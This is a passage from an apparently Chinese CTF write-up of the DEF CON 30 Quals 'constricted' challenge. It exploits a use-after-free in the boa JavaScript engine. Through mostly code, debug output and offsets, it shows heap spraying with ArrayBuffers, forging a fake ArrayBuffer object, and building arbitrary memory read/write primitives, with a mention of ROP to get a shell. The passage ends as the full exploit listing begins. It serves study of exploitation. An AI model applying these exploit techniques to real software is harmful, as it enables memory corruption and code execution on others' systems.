alt="image-20220827095505733"></p><p>这两个段中，地址较低、大小较大的段为 rust 管理的堆内存，上面存放着许多 rust 创建的对象，注意要和 heap 区分开。</p><h3 id="c-spray">c. spray</h3><p>堆喷时，需要让<strong>数组对象</strong>的 <strong>Backing store</strong>，分配至<strong>被释放 JsObject 的 Object 结构体内存空洞</strong>。这样一来，我们就可以通过数组对象来改写 UAF JsObject 的 Object 结构体数据，<strong>构造 fake object</strong>。</p><p>在 JS 引擎漏洞利用中，通常会用 Typed Array + ArrayBuffer 类来占据被释放的内存。因为 boa 提供了针对 ArrayBuffer 的指针输出逻辑，而 BigUint64 有助于后续写入内存时<strong>以八字节为单位</strong>写入数据，这里我们选用 ArrayBuffer 来占内存，使用 BigUint64Array 来解释 ArrayBuffer。</p><p>但这里有些问题需要解决，既然要去占有 UAF 对象，那么：</p><ol><li>UAF 对象大小该怎么确定？</li><li>选什么作为 UAF 对象比较好？</li></ol><p>先说第一个问题。我们较难从 rust 代码中直接看出一个结构体的大小，同时也无法得知 rust 在分配堆内存时其 堆块 metadata 等内容的长度（甚至堆块有没有 metadata 也不知道），但我们可以通过<strong>重复创建相同类型的变量并打印其指针信息</strong>来判断。例如：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">let</span> spray_objs = [];</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">10</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">let</span> obj = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">0x100</span>); <span class="comment">// alloc</span></span><br><span class="line">    <span class="title function_">debug</span>(obj);  <span class="comment">// output</span></span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;&quot;</span>) <span class="comment">// new line</span></span><br><span class="line">    spray_objs.<span class="title function_">push</span>(obj);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>根据输出中多个 Object 指针之间的间隔：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">JsValue @0x729fbc61d260</span><br><span class="line">Object @0x729fbc6e8b28</span><br><span class="line">- Methods @0x729fbc609310</span><br><span class="line">- Array Buffer Data @0x729fbc61e800</span><br><span class="line"></span><br><span class="line">JsValue @0x729fbc61d2a0</span><br><span class="line">Object @0x729fbc6e8ca8</span><br><span class="line">- Methods @0x729fbc609310</span><br><span class="line">- Array Buffer Data @0x729fbc61e900</span><br><span class="line"></span><br><span class="line">JsValue @0x729fbc61d2e0</span><br><span class="line">Object @0x729fbc6e8e28</span><br><span class="line">- Methods @0x729fbc609310</span><br><span class="line">- Array Buffer Data @0x729fbc61ea00</span><br></pre></td></tr></table></figure><p>可以得知 <code>ArrayBuffer</code> 类型的 JSObject，其 <code>Object</code> 结构所占用的内存大小（包括 chunk metadata，下同）为 0x180 字节（也就是下面这个结构体）</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">pub</span> <span class="keyword">struct</span> <span class="title class_">Object</span> &#123;</span><br><span class="line">    <span class="comment">/// The type of the object.</span></span><br><span class="line">    <span class="keyword">pub</span> data: ObjectData,</span><br><span class="line">    <span class="comment">/// The collection of properties contained in the object</span></span><br><span class="line">    properties: PropertyMap,</span><br><span class="line">    <span class="comment">/// Instance prototype `__proto__`.</span></span><br><span class="line">    prototype: JsPrototype,</span><br><span class="line">    <span class="comment">/// Whether it can have new properties added to it.</span></span><br><span class="line">    extensible: <span class="type">bool</span>,</span><br><span class="line">    <span class="comment">/// The `[[PrivateElements]]` internal slot.</span></span><br><span class="line">    private_elements: FxHashMap&lt;Sym, PrivateElement&gt;,</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>那么这样一来就可以比较容易的得知某个 JS 类型的具体内存占用大小。</p><p>现在来到第二个问题。由于在 Spray 阶段分配 ArrayBuffer 时，boa 会同时分配 ArrayBuffer object（大小 0x180 字节）和 Backing store（大小由用户指定，内存对齐），那么我们自然希望堆喷时 <strong>Backing store</strong> 可以占据 UAF memory，而不是被那个与 backing store 同时分配的 ArrayBuffer object 占据。这样一来，UAF object 的大小就不能是 0x180。</p><p>构建一个非 0x180 大小的对象其实很简单，由于空对象 <code>&#123;&#125;</code>的 Object 结构体大小已经为 <code>0x180</code> 字节了，因此随意构建一个诸如 <code>&#123;a:&#123;&#125;&#125;</code> 这样的嵌套对象，其 Object 结构体长度就会变更为 <code>0x300</code>字节。结构越复杂的类，<code>Object</code> 结构体的大小就会越大。</p><p>现在实战一下堆喷：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// tools wrapper</span></span><br><span class="line"><span class="keyword">let</span> <span class="title function_">log</span> = (<span class="params">x</span>) =&gt; &#123; <span class="variable language_">console</span>.<span class="title function_">log</span>(x) &#125;;</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">debug</span> = (<span class="params">x</span>) =&gt; &#123; <span class="title function_">log</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(x)) &#125;;</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">gc</span> = (<span class="params"></span>) =&gt; <span class="variable language_">console</span>.<span class="title function_">collectGarbage</span>();</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">bp</span> = (<span class="params"></span>) =&gt; <span class="variable language_">console</span>.<span class="title function_">sysbreak</span>();</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">sleep</span> = (<span class="params">x</span>) =&gt; <span class="variable language_">console</span>.<span class="title function_">sleep</span>(x);</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">hex</span> = (<span class="params">x</span>) =&gt; (<span class="string">&quot;0x&quot;</span> + x.<span class="title function_">toString</span>(<span class="number">16</span>));</span><br><span class="line"></span><br><span class="line"><span class="comment">// parse tools</span></span><br><span class="line"><span class="comment">// let get_js_value = (obj) =&gt; </span></span><br><span class="line"><span class="comment">//     Number.parseInt(console.debug(obj).split(&quot;JsValue @&quot;)[1].split(&quot;\n&quot;)[0]);</span></span><br><span class="line"><span class="keyword">let</span> <span class="title function_">get_obj_addr</span> = (<span class="params">obj</span>) =&gt; </span><br><span class="line">    <span class="title class_">Number</span>.<span class="built_in">parseInt</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(obj).<span class="title function_">split</span>(<span class="string">&quot;Object @&quot;</span>)[<span class="number">1</span>].<span class="title function_">split</span>(<span class="string">&quot;\n&quot;</span>)[<span class="number">0</span>]);</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">get_method_addr</span> = (<span class="params">obj</span>) =&gt; </span><br><span class="line">    <span class="title class_">Number</span>.<span class="built_in">parseInt</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(obj).<span class="title function_">split</span>(<span class="string">&quot;Methods @&quot;</span>)[<span class="number">1</span>].<span class="title function_">split</span>(<span class="string">&quot;\n&quot;</span>)[<span class="number">0</span>]);</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">get_buffer_data_addr</span> = (<span class="params">obj</span>) =&gt; </span><br><span class="line">    <span class="title class_">Number</span>.<span class="built_in">parseInt</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(obj).<span class="title function_">split</span>(<span class="string">&quot;Buffer Data @&quot;</span>)[<span class="number">1</span>].<span class="title function_">split</span>(<span class="string">&quot;\n&quot;</span>)[<span class="number">0</span>]);</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> fake_timeout = &#123; <span class="title function_">valueOf</span>(<span class="params"></span>) &#123;</span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;[+] fake_timeout called&quot;</span>);</span><br><span class="line">    <span class="title function_">sleep</span>(<span class="number">2000</span>);</span><br><span class="line">    <span class="title function_">gc</span>();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>; </span><br><span class="line">&#125;&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> new_cache = <span class="keyword">new</span> <span class="title class_">TimedCache</span>();</span><br><span class="line">new_cache.<span class="title function_">set</span>(<span class="string">&#x27;spray&#x27;</span>, &#123;<span class="attr">a</span>:&#123;&#125;&#125;, <span class="number">1000</span>);</span><br><span class="line"><span class="keyword">let</span> new_uaf_obj = new_cache.<span class="title function_">get</span>(<span class="string">&quot;spray&quot;</span>, fake_timeout);</span><br><span class="line"><span class="title function_">debug</span>(new_uaf_obj)</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">// let spray_obj = null;</span></span><br><span class="line"><span class="keyword">let</span> spray_objs = [];</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">10</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">let</span> obj = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">0x300</span>);</span><br><span class="line">    <span class="title function_">debug</span>(obj);</span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;&quot;</span>)</span><br><span class="line">    spray_objs.<span class="title function_">push</span>(obj);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_">bp</span>();</span><br></pre></td></tr></table></figure><p>输出：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">JsValue @0x7a7ecde1d090</span><br><span class="line">Object @0x7a7ecdee7aa8      // &lt;----- 1</span><br><span class="line">- Methods @0x7a7ecde09310</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">JsValue @0x7a7ecde1d0e0</span><br><span class="line">Object @0x7a7ecdee7aa8      // &lt;----- 2</span><br><span class="line">- Methods @0x7a7ecde09310</span><br><span class="line">- Array Buffer Data @0x7a7ecdec6000</span><br><span class="line"></span><br><span class="line">JsValue @0x7a7ecde1d120</span><br><span class="line">Object @0x7a7ecdee80a8</span><br><span class="line">- Methods @0x7a7ecde09310</span><br><span class="line">- Array Buffer Data @0x7a7ecdec6300</span><br><span class="line"></span><br><span class="line">JsValue @0x7a7ecde1d160</span><br><span class="line">Object @0x7a7ecdee8228</span><br><span class="line">- Methods @0x7a7ecde09310</span><br><span class="line">- Array Buffer Data @0x7a7ecdec6600</span><br><span class="line">...</span><br></pre></td></tr></table></figure><p>尬住了，内存空洞被 ArrayBuffer 的 Object 给占住了。粗略判断 rust 内存分配策略可能是 first-fit，分配 0x180 时发现有块 0x300 刚好可以切割，于是就分配走了。</p><p>挣扎了一会，终于分配成功了：</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// ...</span></span><br><span class="line"><span class="keyword">let</span> <span class="variable">new_cache</span> = new <span class="title function_ invoke__">TimedCache</span>();</span><br><span class="line">new_cache.<span class="title function_ invoke__">set</span>(<span class="symbol">&#x27;spra</span>y<span class="string">&#x27;, &#123;a:&#123;&#125;,b:&#123;&#125;&#125;, 1000);</span></span><br><span class="line"><span class="string">let new_uaf_obj = new_cache.get(&quot;spray&quot;, fake_timeout);</span></span><br><span class="line"><span class="string">debug(new_uaf_obj)</span></span><br><span class="line"><span class="string">log(&quot;&quot;)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">let spray_objs = [];</span></span><br><span class="line"><span class="string">for(let i = 0; i &lt; 10; i++) &#123;</span></span><br><span class="line"><span class="string">    let obj = new ArrayBuffer(0x180);</span></span><br><span class="line"><span class="string">    debug(obj);</span></span><br><span class="line"><span class="string">    log(&quot;&quot;)</span></span><br><span class="line"><span class="string">    spray_objs.push(obj);</span></span><br><span class="line"><span class="string">&#125;</span></span><br></pre></td></tr></table></figure><p>输出</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">JsValue @0x73dcb281d0c0</span><br><span class="line">Object @0x73dcb28e8228     &lt;----- 1</span><br><span class="line">- Methods @0x73dcb2809310</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">JsValue @0x73dcb281d0a0</span><br><span class="line">Object @0x73dcb28e83a8</span><br><span class="line">- Methods @0x73dcb2809310</span><br><span class="line">- Array Buffer Data @0x73dcb28e8200  &lt;----- 2</span><br><span class="line">...</span><br></pre></td></tr></table></figure><p>这次修改主要是把需要 set 进 TimedCache 的那个对象，从 <code>&#123;a:&#123;&#125;&#125;</code> 修改为 <code>&#123;a:&#123;&#125;, b:&#123;&#125;&#125;</code> ，这样一来 Object 结构体的大小就从 0x300 扩展至 0x480。在第一次分配 ArrayBuffer Object 对象时，内存管理器就<strong>不会立即</strong>从这块被释放的 0x480 上切割，而是获取其他位置的内存；等到第二次需要分配 0x180 大小的 Backing Store 时，再从这块内存空洞上切割一块下来，而 0x180 刚好是 Object 结构体的最低大小。</p><p>测试一下是不是真的占据成功了。在 JS 代码后面加个 <code>debug(uaf_obj)</code> 看看此时的输出：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">JsValue @0x701d8021d110</span><br><span class="line">Object @0x701d802f0228</span><br><span class="line">- Methods @0x0</span><br></pre></td></tr></table></figure><p>ArrayBuffer 分配成功后会清除掉这上面的全部数据，因此此时 uaf_obj 的 Methods 地址变为了 nullptr，验证了堆喷的成功。</p><h3 id="d-fake-obj">d. fake obj</h3><p>现在我们已经占据了被释放的 Object 对象内存空洞。注意到 boa 上存在 RWX 段，我们可以试着将 shellcode 放置在此处并执行：</p><p><img src="/2022/08/defcon30quals_constricted/image-20220827145033703.png" alt="image-20220827145033703"></p><blockquote><p>这个 RWX 段有些奇怪，在某些情况下是会没有 w 权限的，有些情况又会有。</p><p>同时还某些条件下还可能存在两个 RWX 段，神奇。</p></blockquote><p>因此现在较为棘手的任务是<strong>构造任意地址读写原语</strong>。我们可以先为伪造的 obj 设置 method 指针，尝试构造一个 <strong>fake ArrayBuffer</strong>：</p><blockquote><p>通过调试与 debug 输出，可知 fake obj 其 method 指针的偏移量为 0x11 * 8 字节。</p></blockquote><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">let</span> ab = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">0x50</span>);</span><br><span class="line">views.<span class="title function_">setBigInt64</span>(<span class="number">8</span> * <span class="number">0x11</span>, <span class="title class_">BigInt</span>(<span class="title function_">get_method_addr</span>(ab)), <span class="literal">true</span>);</span><br></pre></td></tr></table></figure><p>但如果只是这样，没有修改 Object 的枚举类型为 ArrayBuffer，那就会在使用这个 ArrayBuffer 时产生异常：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Uncaught &quot;TypeError&quot;: &quot;buffer must be an ArrayBuffer&quot;</span><br></pre></td></tr></table></figure><p>尝试去构造一个完整的 ArrayBuffer，但发现如果仅仅凭借着之前 leak 出来的堆地址，想要构造一个完整的 ArrayBuffer 几乎不可能，因为内部结构实在是太复杂了：</p><p><img src="/2022/08/defcon30quals_constricted/image-20220827195903386.png" alt="image-20220827195903386"></p><p>其中涉及到了堆、栈、二进制文件等地址，但目前能拿到的只有堆地址。需要再泄露出栈和二进制文件基地址才可以完成整个 fake obj 的构建。</p><p>那要怎么泄露栈和二进制文件基地址呢？还是尝试新壶装旧酒，通过打印被 free 掉的堆块，来看看有没有什么有用的信息。有意思的是，随着 exp 的编写，<strong>原先那个只能 leak 两个堆指针的 leak 原语，突然间就又可以多 leak 出一个二进制文件基地址了</strong>：</p><p><img src="/2022/08/defcon30quals_constricted/image-20220827171215486.png" alt="image-20220827171215486"></p><p>这样一来，此时就有了<strong>两个堆的基地址</strong>和一个<strong>二进制文件的加载基地址</strong>，但是还是没有栈指针。不过发现这个程序是<strong>直接 panic</strong> 而不是 segment fault，说明那些 ArrayBuffer 中的指针完全没用上，不然就会触发非法指针解引用直接 crash 了。</p><p>既然指针完全没用上，那么就尝试直接硬凑一些数据上去，看看是什么效果。首先要找到 <code>ObjectKind</code> 在 <code>ObjectData</code> 结构体中的相对偏移。通过调试器找到相对偏移量为0：</p><p><img src="/2022/08/defcon30quals_constricted/image-20220827203907974.png" alt="image-20220827203907974"></p><p>之后设置一些<strong>非指针数据</strong>（这些可能是枚举等）上去，并尝试任意地址读取：</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 3. fake obj</span></span><br><span class="line"><span class="keyword">let</span> <span class="variable">views</span> = new <span class="title function_ invoke__">DataView</span>(spray_objs[<span class="number">0</span>]);</span><br><span class="line"><span class="comment">// try to restore the data</span></span><br><span class="line"><span class="keyword">let</span> <span class="variable">ab</span> = new <span class="title function_ invoke__">ArrayBuffer</span>(<span class="number">0x100</span>);</span><br><span class="line"><span class="comment">// ArrayBuffer ptr</span></span><br><span class="line"><span class="keyword">let</span> <span class="variable">ptr</span> = base_addr</span><br><span class="line"></span><br><span class="line"><span class="comment">// Object Kind (ArrayBuffer)</span></span><br><span class="line">views.<span class="title function_ invoke__">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x05</span>, <span class="number">0x02</span>n, <span class="literal">true</span>);        </span><br><span class="line"><span class="comment">// Target pointer</span></span><br><span class="line">views.<span class="title function_ invoke__">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x06</span>, <span class="title function_ invoke__">BigInt</span>(ptr), <span class="literal">true</span>);</span><br><span class="line"><span class="comment">// some size</span></span><br><span class="line">views.<span class="title function_ invoke__">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x07</span>, <span class="number">0x100</span>n, <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_ invoke__">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x08</span>, <span class="number">0x100</span>n, <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_ invoke__">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x09</span>, <span class="number">0x100</span>n, <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_ invoke__">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x0a</span>, <span class="number">0x101</span>n, <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_ invoke__">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x11</span>, <span class="title function_ invoke__">BigInt</span>(<span class="title function_ invoke__">get_method_addr</span>(ab)), <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">debug</span>(ab);</span><br><span class="line"><span class="title function_ invoke__">debug</span>(new_uaf_obj)</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> <span class="variable">new_view</span> = new <span class="title function_ invoke__">DataView</span>(new_uaf_obj);</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> <span class="variable">i</span> = <span class="number">0</span>; i &lt; new_view.byteLength / <span class="number">8</span>; i++)</span><br><span class="line">    <span class="title function_ invoke__">log</span>(new_view.<span class="title function_ invoke__">getBigUint64</span>(<span class="number">8</span> * i).<span class="title function_ invoke__">toString</span>(<span class="number">16</span>))</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">bp</span>();</span><br></pre></td></tr></table></figure><p>输出：</p><p><img src="/2022/08/defcon30quals_constricted/image-20220827204926541.png" alt="image-20220827204926541"></p><p>可以看到当前 fake object 已经被成功识别为 ArrayBuffer，同时从二进制文件基地址处读取到了 ELF 文件头。<strong>任意地址读取原语构造完成</strong>！</p><p>但是在尝试 fake obj 上执行写入操作时，会触发 panic：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">thread &#x27;main&#x27; panicked at &#x27;Object already borrowed: BorrowMutError&#x27;, boa_engine/src/builtins/dataview/mod.rs:684:40</span><br></pre></td></tr></table></figure><p>调试可得知这个 <code>self.flags</code> 相对 <code>ArrayBuffer</code> 的偏移量，将其置为 <code>0</code> 后该 Panic 成功消失：</p><p><img src="/2022/08/defcon30quals_constricted/image-20220827221449146.png" alt="image-20220827221449146"></p><p>但接下来会触发一个 GC 的空指针解引用… 通过栈回溯可以看到，这个 crash 是因为 BigUint64Array 尝试获取 mut 引用时，触发了 Fake obj 的 GC 逻辑，使其开始递归 mark 子字段的数据结构。由于 fake obj 仍然存在一些问题，没能完全复原，因此在递归为 PropertyMap 进行 trace 操作时就会触发 crash：</p><p><img src="/2022/08/defcon30quals_constricted/image-20220827223835389.png" alt="image-20220827223835389"></p><p>看看有没有办法绕过 GC。阅读代码发现只要这个 root 调用的条件不满足，就可以绕过 GC:</p><p><img src="/2022/08/defcon30quals_constricted/image-20220827224113174.png" alt="image-20220827224113174"></p><p>而这个条件又和刚刚设置的 <code>self.flag</code> 有关。刚刚设置为 0 刚好踩坑了（捂脸），应该设置为 1。设置完成后就可以进入内存写入环节：</p><p><img src="/2022/08/defcon30quals_constricted/image-20220827224237536.png" alt="image-20220827224237536"></p><p>上图是在写入时触发 SIGSEGV，不过这个是非常正常的，因为 ELF 头部所在内存是没有写权限的，因此写入会终止。</p><p>换个地址测试一下：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// test read and write</span></span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x06</span>, <span class="title class_">BigInt</span>(base_addr + <span class="number">0x1218000</span>), <span class="literal">true</span>);</span><br><span class="line"><span class="title function_">log</span>(new_view.<span class="title function_">getBigUint64</span>(<span class="number">0</span>).<span class="title function_">toString</span>(<span class="number">16</span>));</span><br><span class="line">new_view.<span class="title function_">setBigUint64</span>(<span class="number">0</span>, <span class="number">0x1122334455667788n</span>);</span><br><span class="line"><span class="title function_">log</span>(new_view.<span class="title function_">getBigUint64</span>(<span class="number">0</span>).<span class="title function_">toString</span>(<span class="number">16</span>));</span><br><span class="line"></span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x06</span>, <span class="title class_">BigInt</span>(base_addr + <span class="number">0x1218100</span>), <span class="literal">true</span>);</span><br><span class="line"><span class="title function_">log</span>(new_view.<span class="title function_">getBigUint64</span>(<span class="number">0</span>).<span class="title function_">toString</span>(<span class="number">16</span>));</span><br><span class="line">new_view.<span class="title function_">setBigUint64</span>(<span class="number">0</span>, <span class="number">0x33445566778899aan</span>);</span><br><span class="line"><span class="title function_">log</span>(new_view.<span class="title function_">getBigUint64</span>(<span class="number">0</span>).<span class="title function_">toString</span>(<span class="number">16</span>));</span><br></pre></td></tr></table></figure><p>可以看到值已经成功写入目标内存区域：</p><p><img src="/2022/08/defcon30quals_constricted/image-20220827225551875.png" alt="image-20220827225551875"></p><p><strong>任意地址写原语</strong>构造完成！</p><h2 id="六、后续">六、后续</h2><p>当<strong>任意地址读写原语</strong>构造出来后，后续的漏洞利用就是体力活了。利用任意地址读写原语，可以泄露栈、libc 等所有地址，同时也可以实现在数据段上部署 ROP 链，然后通过 stack pivot 来劫持控制流 get shell，这些就不再细讲了。</p><p>以下是编写的任意地址读写原语。注意这个 exp 是在本机环境测试，因此有些偏移或堆分布等会存在一些差异。</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// tools wrapper</span></span><br><span class="line"><span class="keyword">let</span> <span class="title function_">log</span> = (<span class="params">x</span>) =&gt; &#123; <span class="variable language_">console</span>.<span class="title 